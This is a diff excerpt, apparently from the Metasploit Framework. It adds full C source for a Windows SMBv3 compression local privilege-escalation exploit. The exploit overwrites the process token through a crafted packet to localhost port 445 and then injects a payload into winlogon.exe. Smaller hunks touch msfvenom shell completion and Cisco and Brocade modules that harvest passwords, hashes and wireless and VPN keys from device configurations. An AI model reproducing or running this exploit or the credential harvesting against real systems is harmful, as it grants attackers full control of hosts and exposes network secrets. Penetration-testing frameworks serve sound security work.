+		PVOID object = pHandleInfo->Handles[i].Object;
+		ULONG_PTR handle = pHandleInfo->Handles[i].HandleValue;
+		DWORD pid = (DWORD)pHandleInfo->Handles[i].UniqueProcessId;
+		if (pid != mypid)
+			continue;
+		if (handle == (ULONG_PTR)h)
+			return (ULONG64)object;
+	}
+	return 0;
+}
+
+ULONG64 get_process_token() {
+	HANDLE token;
+	HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
+	if (proc == INVALID_HANDLE_VALUE)
+		return 0;
+
+	OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token);
+	return get_handle_addr(token);
+}
+
+int error_exit(SOCKET sock) {
+	WSACleanup();
+	return EXIT_FAILURE;
+}
+
+int send_negotiation(SOCKET sock) {
+	int err = 0;
+	char response[8] = { 0 };
+
+	const uint8_t buf[] = {
+		/* NetBIOS Wrapper */
+		0x00,                   /* session */
+		0x00, 0x00, 0xC4,       /* length */
+
+		/* SMB Header */
+		0xFE, 0x53, 0x4D, 0x42, /* protocol id */
+		0x40, 0x00,             /* structure size, must be 0x40 */
+		0x00, 0x00,             /* credit charge */
+		0x00, 0x00,             /* channel sequence */
+		0x00, 0x00,             /* channel reserved */
+		0x00, 0x00,             /* command */
+		0x00, 0x00,             /* credits requested */
+		0x00, 0x00, 0x00, 0x00, /* flags */
+		0x00, 0x00, 0x00, 0x00, /* chain offset */
+		0x00, 0x00, 0x00, 0x00, /* message id */
+		0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x00, /* reserved */
+		0x00, 0x00, 0x00, 0x00, /* tree id */
+		0x00, 0x00, 0x00, 0x00, /* session id */
+		0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x00, /* signature */
+		0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x00,
+
+		/* SMB Negotiation Request */
+		0x24, 0x00,             /* structure size */
+		0x08, 0x00,             /* dialect count, 8 */
+		0x00, 0x00,             /* security mode */
+		0x00, 0x00,             /* reserved */
+		0x7F, 0x00, 0x00, 0x00, /* capabilities */
+		0x01, 0x02, 0xAB, 0xCD, /* guid */
+		0x01, 0x02, 0xAB, 0xCD,
+		0x01, 0x02, 0xAB, 0xCD,
+		0x01, 0x02, 0xAB, 0xCD,
+		0x78, 0x00,             /* negotiate context */
+		0x00, 0x00,             /* additional padding */
+		0x02, 0x00,             /* negotiate context count */
+		0x00, 0x00,             /* reserved 2 */
+		0x02, 0x02,             /* dialects, SMB 2.0.2 */
+		0x10, 0x02,             /* SMB 2.1 */
+		0x22, 0x02,             /* SMB 2.2.2 */
+		0x24, 0x02,             /* SMB 2.2.3 */
+		0x00, 0x03,             /* SMB 3.0 */
+		0x02, 0x03,             /* SMB 3.0.2 */
+		0x10, 0x03,             /* SMB 3.0.1 */
+		0x11, 0x03,             /* SMB 3.1.1 */
+		0x00, 0x00, 0x00, 0x00, /* padding */
+
+		/* Preauth context */
+		0x01, 0x00,             /* type */
+		0x26, 0x00,             /* length */
+		0x00, 0x00, 0x00, 0x00, /* reserved */
+		0x01, 0x00,             /* hash algorithm count */
+		0x20, 0x00,             /* salt length */
+		0x01, 0x00,             /* hash algorith, SHA512 */
+		0x00, 0x00, 0x00, 0x00, /* salt */
+		0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00,             /* pad */
+
+		/* Compression context */
+		0x03, 0x00,             /* type */
+		0x0E, 0x00,             /* length */
+		0x00, 0x00, 0x00, 0x00, /* reserved */
+		0x02, 0x00,             /* compression algorithm count */
+		0x00, 0x00,             /* padding */
+		0x01, 0x00, 0x00, 0x00, /* flags */
+		0x02, 0x00,             /* LZ77 */
+		0x03, 0x00,             /* LZ77+Huffman */
+		0x00, 0x00, 0x00, 0x00, /* padding */
+		0x00, 0x00, 0x00, 0x00
+	};
+
+	if ((err = send(sock, (const char*)buf, sizeof(buf), 0)) != SOCKET_ERROR) {
+		recv(sock, response, sizeof(response), 0);
+	}
+
+	return err;
+}
+
+int send_compressed(SOCKET sock, unsigned char* buffer, ULONG len) {
+	int err = 0;
+	char response[8] = { 0 };
+
+	const uint8_t buf[] = {
+		/* NetBIOS Wrapper */
+		0x00,
+		0x00, 0x00, 0x33,
+
+		/* SMB Header */
+		0xFC, 0x53, 0x4D, 0x42, /* protocol id */
+		0xFF, 0xFF, 0xFF, 0xFF, /* original decompressed size, trigger arithmetic overflow */
+		0x02, 0x00,             /* compression algorithm, LZ77 */
+		0x00, 0x00,             /* flags */
+		0x10, 0x00, 0x00, 0x00, /* offset */
+	};
+
+	uint8_t* packet = (uint8_t*)malloc(sizeof(buf) + 0x10 + len);
+	if (packet == NULL) {
+		return error_exit(sock);
+	}
+
+	memcpy(packet, buf, sizeof(buf));
+	*(uint64_t*)(packet + sizeof(buf)) = 0x1FF2FFFFBC;
+	*(uint64_t*)(packet + sizeof(buf) + 0x8) = 0x1FF2FFFFBC;
+	memcpy(packet + sizeof(buf) + 0x10, buffer, len);
+
+	if ((err = send(sock, (const char*)packet, sizeof(buf) + 0x10 + len, 0)) != SOCKET_ERROR) {
+		recv(sock, response, sizeof(response), 0);
+	}
+
+	free(packet);
+	return err;
+}
+
+void inject(PMSF_PAYLOAD pMsfPayload) {
+	PROCESSENTRY32 entry;
+	entry.dwSize = sizeof(PROCESSENTRY32);
+
+	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+
+	int pid = -1;
+	if (Process32First(snapshot, &entry) == TRUE) {
+		while (Process32Next(snapshot, &entry) == TRUE) {
+			if (lstrcmpiA(entry.szExeFile, "winlogon.exe") == 0) {
+				pid = entry.th32ProcessID;
+				break;
+			}
+		}
+	}
+	CloseHandle(snapshot);
+
+	if (pid < 0) {
+		return;
+	}
+
+	HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
+	if (hProc == NULL) {
+		return;
+	}
+
+	LPVOID lpMem = VirtualAllocEx(hProc, NULL, pMsfPayload->dwSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	if (lpMem == NULL) {
+		return;
+	}
+	if (!WriteProcessMemory(hProc, lpMem, &pMsfPayload->cPayloadData, pMsfPayload->dwSize, 0)) {
+		return;
+	}
+	if (!CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, 0, 0, 0)) {
+		return;
+	}
+}
+
+DWORD exploit(PMSF_PAYLOAD pMsfPayload) {
+	WORD wVersionRequested = MAKEWORD(2, 2);
+	WSADATA wsaData = { 0 };
+	SOCKET sock = INVALID_SOCKET;
+	uint64_t ktoken = 0;
+
+	int err = 0;
+
+	if ((err = WSAStartup(wVersionRequested, &wsaData)) != 0) {
+		return EXIT_FAILURE;
+	}
+
+	if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2) {
+		WSACleanup();
+		return EXIT_FAILURE;
+	}
+
+	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+	if (sock == INVALID_SOCKET) {
+		WSACleanup();
+		return EXIT_FAILURE;
+	}
+
+	SOCKADDR_IN client;
+	client.sin_family = AF_INET;
+	client.sin_port = htons(445);
+	InetPton(AF_INET, "127.0.0.1", &client.sin_addr);
+
+	if (connect(sock, (SOCKADDR*)&client, sizeof(client)) == SOCKET_ERROR) {
+		return error_exit(sock);
+	}
+
+	if (send_negotiation(sock) == SOCKET_ERROR) {
+		return error_exit(sock);
+	}
+
+	ULONG buffer_size = 0x1110;
+	UCHAR* buffer = (UCHAR*)malloc(buffer_size);
+	if (buffer == NULL) {
+		return error_exit(sock);
+	}
+
+	ktoken = get_process_token();
+	if (ktoken == 0) {
+		return EXIT_FAILURE;
+	}
+
+	HMODULE ntdll = GetModuleHandle("ntdll.dll");
+	if (ntdll == NULL) {
+		return EXIT_FAILURE;
+	}
+	fpRtlGetCompressionWorkSpaceSize RtlGetCompressionWorkSpaceSize = (fpRtlGetCompressionWorkSpaceSize)GetProcAddress(ntdll, "RtlGetCompressionWorkSpaceSize");
+	if (RtlGetCompressionWorkSpaceSize == NULL) {
+		return EXIT_FAILURE;
+	}
+	fpRtlCompressBuffer RtlCompressBuffer = (fpRtlCompressBuffer)GetProcAddress(ntdll, "RtlCompressBuffer");
+	if (RtlCompressBuffer == NULL) {
+		return EXIT_FAILURE;
+	}
+
+	memset(buffer, 'A', 0x1108);
+	*(uint64_t*)(buffer + 0x1108) = ktoken + 0x40; /* where we want to write */
+
+	ULONG CompressBufferWorkSpaceSize = 0;
+	ULONG CompressFragmentWorkSpaceSize = 0;
+	err = RtlGetCompressionWorkSpaceSize(COMPRESSION_FORMAT_XPRESS,
+		&CompressBufferWorkSpaceSize, &CompressFragmentWorkSpaceSize);
+
+	if (err != STATUS_SUCCESS) {
+		return error_exit(sock);
+	}
+
+	ULONG FinalCompressedSize;
+	UCHAR compressed_buffer[64];
+	LPVOID lpWorkSpace = malloc(CompressBufferWorkSpaceSize);
+	if (lpWorkSpace == NULL) {
+		return error_exit(sock);
+	}
+
+	err = RtlCompressBuffer(COMPRESSION_FORMAT_XPRESS, buffer, buffer_size,
+		compressed_buffer, sizeof(compressed_buffer), 4096, &FinalCompressedSize, lpWorkSpace);
+
+	if (err != STATUS_SUCCESS) {
+		free(lpWorkSpace);
+		return error_exit(sock);
+	}
+
+	if (send_compressed(sock, compressed_buffer, FinalCompressedSize) == SOCKET_ERROR) {
+		return error_exit(sock);
+	}
+
+	inject(pMsfPayload);
+
+	WSACleanup();
+	return EXIT_SUCCESS;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	BOOL bReturnValue = TRUE;
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		hAppInstance = hinstDLL;
+		if (lpReserved != NULL)
+		{
+			*(HMODULE*)lpReserved = hAppInstance;
+		}
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		exploit((PMSF_PAYLOAD)lpReserved);
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return bReturnValue;
+}
@@ -0,0 +1,245 @@
+#ifndef _EXPLOIT_H
+#define _EXPLOIT_H
+
+#include <windows.h>
+
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
+	PVOID Object;
+	ULONG_PTR UniqueProcessId;
+	ULONG_PTR HandleValue;
+	ULONG GrantedAccess;
+	USHORT CreatorBackTraceIndex;
+	USHORT ObjectTypeIndex;
+	ULONG HandleAttributes;
+	ULONG Reserved;
+} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
+	ULONG_PTR NumberOfHandles;
+	ULONG_PTR Reserved;
+	SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
+} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
+
+typedef enum _SYSTEM_INFORMATION_CLASS {
+	SystemBasicInformation = 0,
+	SystemProcessorInformation = 1,
+	SystemPerformanceInformation = 2,
+	SystemTimeOfDayInformation = 3,
+	SystemPathInformation = 4,
+	SystemProcessInformation = 5,
+	SystemCallCountInformation = 6,
+	SystemDeviceInformation = 7,
+	SystemProcessorPerformanceInformation = 8,
+	SystemFlagsInformation = 9,
+	SystemCallTimeInformation = 10,
+	SystemModuleInformation = 11,
+	SystemLocksInformation = 12,
+	SystemStackTraceInformation = 13,
+	SystemPagedPoolInformation = 14,
+	SystemNonPagedPoolInformation = 15,
+	SystemHandleInformation = 16,
+	SystemObjectInformation = 17,
+	SystemPageFileInformation = 18,
+	SystemVdmInstemulInformation = 19,
+	SystemVdmBopInformation = 20,
+	SystemFileCacheInformation = 21,
+	SystemPoolTagInformation = 22,
+	SystemInterruptInformation = 23,
+	SystemDpcBehaviorInformation = 24,
+	SystemFullMemoryInformation = 25,
+	SystemLoadGdiDriverInformation = 26,
+	SystemUnloadGdiDriverInformation = 27,
+	SystemTimeAdjustmentInformation = 28,
+	SystemSummaryMemoryInformation = 29,
+	SystemMirrorMemoryInformation = 30,
+	SystemPerformanceTraceInformation = 31,
+	SystemObsolete0 = 32,
+	SystemExceptionInformation = 33,
+	SystemCrashDumpStateInformation = 34,
+	SystemKernelDebuggerInformation = 35,
+	SystemContextSwitchInformation = 36,
+	SystemRegistryQuotaInformation = 37,
+	SystemExtendServiceTableInformation = 38,
+	SystemPrioritySeperation = 39,
+	SystemVerifierAddDriverInformation = 40,
+	SystemVerifierRemoveDriverInformation = 41,
+	SystemProcessorIdleInformation = 42,
+	SystemLegacyDriverInformation = 43,
+	SystemCurrentTimeZoneInformation = 44,
+	SystemLookasideInformation = 45,
+	SystemTimeSlipNotification = 46,
+	SystemSessionCreate = 47,
+	SystemSessionDetach = 48,
+	SystemSessionInformation = 49,
+	SystemRangeStartInformation = 50,
+	SystemVerifierInformation = 51,
+	SystemVerifierThunkExtend = 52,
+	SystemSessionProcessInformation = 53,
+	SystemLoadGdiDriverInSystemSpace = 54,
+	SystemNumaProcessorMap = 55,
+	SystemPrefetcherInformation = 56,
+	SystemExtendedProcessInformation = 57,
+	SystemRecommendedSharedDataAlignment = 58,
+	SystemComPlusPackage = 59,
+	SystemNumaAvailableMemory = 60,
+	SystemProcessorPowerInformation = 61,
+	SystemEmulationBasicInformation = 62,
+	SystemEmulationProcessorInformation = 63,
+	SystemExtendedHandleInformation = 64,
+	SystemLostDelayedWriteInformation = 65,
+	SystemBigPoolInformation = 66,
+	SystemSessionPoolTagInformation = 67,
+	SystemSessionMappedViewInformation = 68,
+	SystemHotpatchInformation = 69,
+	SystemObjectSecurityMode = 70,
+	SystemWatchdogTimerHandler = 71,
+	SystemWatchdogTimerInformation = 72,
+	SystemLogicalProcessorInformation = 73,
+	SystemWow64SharedInformationObsolete = 74,
+	SystemRegisterFirmwareTableInformationHandler = 75,
+	SystemFirmwareTableInformation = 76,
+	SystemModuleInformationEx = 77,
+	SystemVerifierTriageInformation = 78,
+	SystemSuperfetchInformation = 79,
+	SystemMemoryListInformation = 80,
+	SystemFileCacheInformationEx = 81,
+	SystemThreadPriorityClientIdInformation = 82,
+	SystemProcessorIdleCycleTimeInformation = 83,
+	SystemVerifierCancellationInformation = 84,
+	SystemProcessorPowerInformationEx = 85,
+	SystemRefTraceInformation = 86,
+	SystemSpecialPoolInformation = 87,
+	SystemProcessIdInformation = 88,
+	SystemErrorPortInformation = 89,
+	SystemBootEnvironmentInformation = 90,
+	SystemHypervisorInformation = 91,
+	SystemVerifierInformationEx = 92,
+	SystemTimeZoneInformation = 93,
+	SystemImageFileExecutionOptionsInformation = 94,
+	SystemCoverageInformation = 95,
+	SystemPrefetchPatchInformation = 96,
+	SystemVerifierFaultsInformation = 97,
+	SystemSystemPartitionInformation = 98,
+	SystemSystemDiskInformation = 99,
+	SystemProcessorPerformanceDistribution = 100,
+	SystemNumaProximityNodeInformation = 101,
+	SystemDynamicTimeZoneInformation = 102,
+	SystemCodeIntegrityInformation = 103,
+	SystemProcessorMicrocodeUpdateInformation = 104,
+	SystemProcessorBrandString = 105,
+	SystemVirtualAddressInformation = 106,
+	SystemLogicalProcessorAndGroupInformation = 107,
+	SystemProcessorCycleTimeInformation = 108,
+	SystemStoreInformation = 109,
+	SystemRegistryAppendString = 110,
+	SystemAitSamplingValue = 111,
+	SystemVhdBootInformation = 112,
+	SystemCpuQuotaInformation = 113,
+	SystemNativeBasicInformation = 114,
+	SystemErrorPortTimeouts = 115,
+	SystemLowPriorityIoInformation = 116,
+	SystemBootEntropyInformation = 117,
+	SystemVerifierCountersInformation = 118,
+	SystemPagedPoolInformationEx = 119,
+	SystemSystemPtesInformationEx = 120,
+	SystemNodeDistanceInformation = 121,
+	SystemAcpiAuditInformation = 122,
+	SystemBasicPerformanceInformation = 123,
+	SystemQueryPerformanceCounterInformation = 124,
+	SystemSessionBigPoolInformation = 125,
+	SystemBootGraphicsInformation = 126,
+	SystemScrubPhysicalMemoryInformation = 127,
+	SystemBadPageInformation = 128,
+	SystemProcessorProfileControlArea = 129,
+	SystemCombinePhysicalMemoryInformation = 130,
+	SystemEntropyInterruptTimingInformation = 131,
+	SystemConsoleInformation = 132,
+	SystemPlatformBinaryInformation = 133,
+	SystemPolicyInformation = 134,
+	SystemHypervisorProcessorCountInformation = 135,
+	SystemDeviceDataInformation = 136,
+	SystemDeviceDataEnumerationInformation = 137,
+	SystemMemoryTopologyInformation = 138,
+	SystemMemoryChannelInformation = 139,
+	SystemBootLogoInformation = 140,
+	SystemProcessorPerformanceInformationEx = 141,
+	SystemSpare0 = 142,
+	SystemSecureBootPolicyInformation = 143,
+	SystemPageFileInformationEx = 144,
+	SystemSecureBootInformation = 145,
+	SystemEntropyInterruptTimingRawInformation = 146,
+	SystemPortableWorkspaceEfiLauncherInformation = 147,
+	SystemFullProcessInformation = 148,
+	SystemKernelDebuggerInformationEx = 149,
+	SystemBootMetadataInformation = 150,
+	SystemSoftRebootInformation = 151,
+	SystemElamCertificateInformation = 152,
+	SystemOfflineDumpConfigInformation = 153,
+	SystemProcessorFeaturesInformation = 154,
+	SystemRegistryReconciliationInformation = 155,
+	SystemEdidInformation = 156,
+	SystemManufacturingInformation = 157,
+	SystemEnergyEstimationConfigInformation = 158,
+	SystemHypervisorDetailInformation = 159,
+	SystemProcessorCycleStatsInformation = 160,
+	SystemVmGenerationCountInformation = 161,
+	SystemTrustedPlatformModuleInformation = 162,
+	SystemKernelDebuggerFlags = 163,
+	SystemCodeIntegrityPolicyInformation = 164,
+	SystemIsolatedUserModeInformation = 165,
+	SystemHardwareSecurityTestInterfaceResultsInformation = 166,
+	SystemSingleModuleInformation = 167,
+	SystemAllowedCpuSetsInformation = 168,
+	SystemDmaProtectionInformation = 169,
+	SystemInterruptCpuSetsInformation = 170,
+	SystemSecureBootPolicyFullInformation = 171,
+	SystemCodeIntegrityPolicyFullInformation = 172,
+	SystemAffinitizedInterruptProcessorInformation = 173,
+	SystemRootSiloInformation = 174,
+	SystemCpuSetInformation = 175,
+	SystemCpuSetTagInformation = 176,
+	SystemWin32WerStartCallout = 177,
+	SystemSecureKernelProfileInformation = 178,
+	SystemCodeIntegrityPlatformManifestInformation = 179,
+	SystemInterruptSteeringInformation = 180,
+	SystemSupportedProcessorArchitectures = 181,
+	SystemMemoryUsageInformation = 182,
+	SystemCodeIntegrityCertificateInformation = 183,
+	SystemPhysicalMemoryInformation = 184,
+	SystemControlFlowTransition = 185,
+	SystemKernelDebuggingAllowed = 186,
+	SystemActivityModerationExeState = 187,
+	SystemActivityModerationUserSettings = 188,
+	SystemCodeIntegrityPoliciesFullInformation = 189,
+	SystemCodeIntegrityUnlockInformation = 190,
+	SystemIntegrityQuotaInformation = 191,
+	SystemFlushInformation = 192,
+	SystemProcessorIdleMaskInformation = 193,
+	SystemSecureDumpEncryptionInformation = 194,
+	SystemWriteConstraintInformation = 195,
+	SystemKernelVaShadowInformation = 196,
+	SystemHypervisorSharedPageInformation = 197,
+	SystemFirmwareBootPerformanceInformation = 198,
+	SystemCodeIntegrityVerificationInformation = 199,
+	SystemFirmwarePartitionInformation = 200,
+	SystemSpeculationControlInformation = 201,
+	SystemDmaGuardPolicyInformation = 202,
+	SystemEnclaveLaunchControlInformation = 203,
+	SystemWorkloadAllowedCpuSetsInformation = 204,
+	SystemCodeIntegrityUnlockModeInformation = 205,
+	SystemLeapSecondInformation = 206,
+	SystemFlags2Information = 207,
+	SystemSecurityModelInformation = 208,
+	SystemCodeIntegritySyntheticCacheInformation = 209,
+	MaxSystemInfoClass
+} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;
+
+#define STATUS_SUCCESS                   ((NTSTATUS)0x00000000L)    // ntsubauth
+
+typedef ULONG NTSTATUS;
+
+typedef NTSTATUS(WINAPI* fpRtlGetCompressionWorkSpaceSize)(USHORT, PULONG, PULONG);
+typedef NTSTATUS(WINAPI* fpRtlCompressBuffer)(USHORT, PUCHAR, ULONG, PUCHAR, ULONG, ULONG, PULONG, PVOID);
+typedef NTSTATUS(WINAPI* fpNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
+
+#endif
@@ -164,7 +164,7 @@ _msfvenom_formats_list=(
  'vbscript'
 )

-_msfvenom_format() {
+_msfvenom_formats() {
  _describe -t formats 'available formats' _msfvenom_formats_list || compadd "$@"
 }

@@ -207,6 +207,19 @@ _msfvenom_platform() {
  _describe -t platforms 'available platforms' _msfvenom_platforms_list || compadd "$@"
 }

+_msfvenom_payload() {
+  local cacheFile="$HOME/.msf4/store/modules_metadata.json"
+  local -a _msfvenom_payloads_list
+  [ -f "$cacheFile" ] || cacheFile="/opt/metasploit/db/modules_metadata_base.json"
+  if [ ! -f "$cacheFile" ]; then
+    _message -r "Cannot find metasploit cache file. Run msfconsole to populate it"
+    compadd "$@"
+  else
+    _msfvenom_payloads_list=("${(f)$(sed -n '/"type": "payload"/,/"ref_name"/p' "$cacheFile" | grep -E '(ref_name|description)' | cut -d '"' -f 4 | sed -n 'h;n;p;g;p' | sed 'N;s/\n/:/; s/\\n.*$//')}")
+    _describe -t payloads 'available payloads' _msfvenom_payloads_list || compadd "$@"
+  fi
+}
+
 _arguments \
  "--smallest[Generate the smallest possible payload using all available encoders]" \
  "--sec-name[The new section name to use when generating large Windows binaries. Default: random 4-character alpha string]" \
@@ -228,7 +241,7 @@ _arguments \
  {-l,--list}"[List all modules for \[type\]]:module type:(payloads encoders nops platforms archs encrypt formats all)" \
  {-n,--nopsled}"[Prepend a nopsled of \[length\] size on to the payload]:nopsled length" \
  {-o,--out}"[Save the payload to a file]:output file:_files" \
-  {-p,--payload}"[Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom]:payload" \
+  {-p,--payload}"[Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom]:target payload:_msfvenom_payload" \
  {-s,--space}"[The maximum size of the resulting payload]:length" \
  {-t,--timeout}"[The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)]:second" \
  {-v,--var-name}"[Specify a custom variable name to use for certain output formats]:value" \
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "5.0.83"
+      VERSION = "5.0.86"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -57,6 +57,7 @@ module Auxiliary::Brocade
      protocol: 'tcp',
      workspace_id: myworkspace.id,
      origin_type: :service,
+      private_type: :nonreplayable_hash,
      service_name: '',
      module_fullname: self.fullname,
      status: Metasploit::Model::Login::Status::UNTRIED
@@ -81,7 +82,6 @@ module Auxiliary::Brocade
        cred = credential_data.dup
        cred[:username] = 'enable'
        cred[:private_data] = admin_hash
-        cred[:private_type] = :nonreplayable_hash
        create_credential_and_login(cred)
      end
    end
@@ -98,7 +98,6 @@ module Auxiliary::Brocade
        cred = credential_data.dup
        cred[:username] = user_name
        cred[:private_data] = user_hash
-        cred[:private_type] = :nonreplayable_hash
        create_credential_and_login(cred)
      end
    end
@@ -117,7 +116,6 @@ module Auxiliary::Brocade
        cred[:port] = 161
        cred[:service_name] = 'snmp'
        cred[:private_data] = snmp_community
-        cred[:private_type] = :nonreplayable_hash
        create_credential_and_login(cred)
      end
    end
@@ -41,6 +41,7 @@ module Auxiliary::Cisco
      protocol: 'tcp',
      workspace_id: myworkspace.id,
      origin_type: :service,
+      private_type: :password,
      service_name: '',
      module_fullname: self.fullname,
      status: Metasploit::Model::Login::Status::UNTRIED
@@ -81,7 +82,6 @@ module Auxiliary::Cisco

          if stype == 5
            print_good("#{thost}:#{tport} MD5 Encrypted Enable Password: #{shash}")
-            store_loot("cisco.ios.enable_hash", "text/plain", thost, shash, "enable_password_hash.txt", "Cisco IOS Enable Password Hash (MD5)")
            cred = credential_data.dup
            cred[:jtr_format] = 'md5'
            cred[:private_data] = shash
@@ -91,23 +91,16 @@ module Auxiliary::Cisco

          if stype == 0 #unencrypted
            print_good("#{thost}:#{tport} Enable Password: #{shash}")
-            store_loot("cisco.ios.enable_pass", "text/plain", thost, shash, "enable_password.txt", "Cisco IOS Enable Password")
-
            cred = credential_data.dup
            cred[:private_data] = shash
-            cred[:private_type] = :password
            create_credential_and_login(cred)
-
          end

          if stype == 7
            shash = cisco_ios_decrypt7(shash) rescue shash
            print_good("#{thost}:#{tport} Decrypted Enable Password: #{shash}")
-            store_loot("cisco.ios.enable_pass", "text/plain", thost, shash, "enable_password.txt", "Cisco IOS Enable Password")
-
            cred = credential_data.dup
            cred[:private_data] = shash
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

@@ -117,7 +110,6 @@ module Auxiliary::Cisco

          cred = credential_data.dup
          cred[:private_data] = spass
-          cred[:private_type] = :password
          create_credential_and_login(cred)

 #
@@ -137,7 +129,6 @@ module Auxiliary::Cisco
          cred[:protocol] = "udp"
          cred[:port] = 161
          cred[:private_data] = scomm
-          cred[:private_type] = :password
          create_credential_and_login(cred)
 #
 # VTY Passwords
@@ -150,15 +141,12 @@ module Auxiliary::Cisco

          cred = credential_data.dup
          cred[:private_data] = spass
-          cred[:private_type] = :password
          create_credential_and_login(cred)


        when /^\s*(password|secret) 5 (.*)/i
          shash = $2.strip
          print_good("#{thost}:#{tport} MD5 Encrypted VTY Password: #{shash}")
-          store_loot("cisco.ios.vty_password", "text/plain", thost, shash, "vty_password_hash.txt", "Cisco IOS VTY Password Hash (MD5)")
-
          cred = credential_data.dup
          cred[:jtr_format] = 'md5'
          cred[:private_data] = shash
@@ -171,7 +159,6 @@ module Auxiliary::Cisco

          cred = credential_data.dup
          cred[:private_data] = spass
-          cred[:private_type] = :password
          create_credential_and_login(cred)

 #
@@ -180,7 +167,6 @@ module Auxiliary::Cisco
        when /^\s*encryption key \d+ size \d+bit (\d+) ([^\s]+)/
          spass = $2.strip
          print_good("#{thost}:#{tport} Wireless WEP Key: #{spass}")
-          store_loot("cisco.ios.wireless_wep", "text/plain", thost, spass, "wireless_wep.txt", "Cisco IOS Wireless WEP Key")

        when /^\s*wpa-psk (ascii|hex) (\d+) ([^\s]+)/i

@@ -189,7 +175,6 @@ module Auxiliary::Cisco

          if stype == 5
            print_good("#{thost}:#{tport} Wireless WPA-PSK MD5 Password Hash: #{spass}")
-            store_loot("cisco.ios.wireless_wpapsk_hash", "text/plain", thost, spass, "wireless_wpapsk_hash.txt", "Cisco IOS Wireless WPA-PSK Password Hash (MD5)")
            cred = credential_data.dup
            cred[:jtr_format] = 'md5'
            cred[:private_data] = spass
@@ -199,20 +184,16 @@ module Auxiliary::Cisco

          if stype == 0
            print_good("#{thost}:#{tport} Wireless WPA-PSK Password: #{spass}")
-            store_loot("cisco.ios.wireless_wpapsk", "text/plain", thost, spass, "wireless_wpapsk.txt", "Cisco IOS Wireless WPA-PSK Password")
            cred = credential_data.dup
            cred[:private_data] = spass
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

          if stype == 7
            spass = cisco_ios_decrypt7(spass) rescue spass
            print_good("#{thost}:#{tport} Wireless WPA-PSK Decrypted Password: #{spass}")
-            store_loot("cisco.ios.wireless_wpapsk", "text/plain", thost, spass, "wireless_wpapsk.txt", "Cisco IOS Wireless WPA-PSK Decrypted Password")
            cred = credential_data.dup
            cred[:private_data] = spass
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

@@ -224,8 +205,6 @@ module Auxiliary::Cisco
          shost  = $2

          print_good("#{thost}:#{tport} VPN IPSEC ISAKMP Key '#{spass}' Host '#{shost}'")
-          store_loot("cisco.ios.vpn_ipsec_key", "text/plain", thost, "#{spass}", "vpn_ipsec_key.txt", "Cisco VPN IPSEC Key")
-
          cred = credential_data.dup
          cred[:private_data] = spass
          cred[:private_type] = :nonreplayable_hash
@@ -239,8 +218,6 @@ module Auxiliary::Cisco
          siface = tuniface

          print_good("#{thost}:#{tport} GRE Tunnel Key #{spass} for Interface Tunnel #{siface}")
-          store_loot("cisco.ios.gre_tunnel_key", "text/plain", thost, "tunnel#{siface}_#{spass}", "gre_tunnel_key.txt", "Cisco GRE Tunnel Key")
-
          cred = credential_data.dup
          cred[:private_data] = spass
          cred[:private_type] = :nonreplayable_hash
@@ -251,8 +228,6 @@ module Auxiliary::Cisco
          siface = tuniface

          print_good("#{thost}:#{tport} NHRP Authentication Key #{spass} for Interface Tunnel #{siface}")
-          store_loot("cisco.ios.nhrp_tunnel_key", "text/plain", thost, "tunnel#{siface}_#{spass}", "nhrp_tunnel_key.txt", "Cisco NHRP Authentication Key")
-
          cred = credential_data.dup
          cred[:private_data] = spass
          cred[:private_type] = :nonreplayable_hash
@@ -270,7 +245,6 @@ module Auxiliary::Cisco

          if stype == 5
            print_good("#{thost}:#{tport} Username '#{user}' with MD5 Encrypted Password: #{spass}")
-            store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
            cred = credential_data.dup
            cred[:jtr_format] = 'md5'
            cred[:username] = user.to_s
@@ -281,24 +255,18 @@ module Auxiliary::Cisco

          if stype == 0
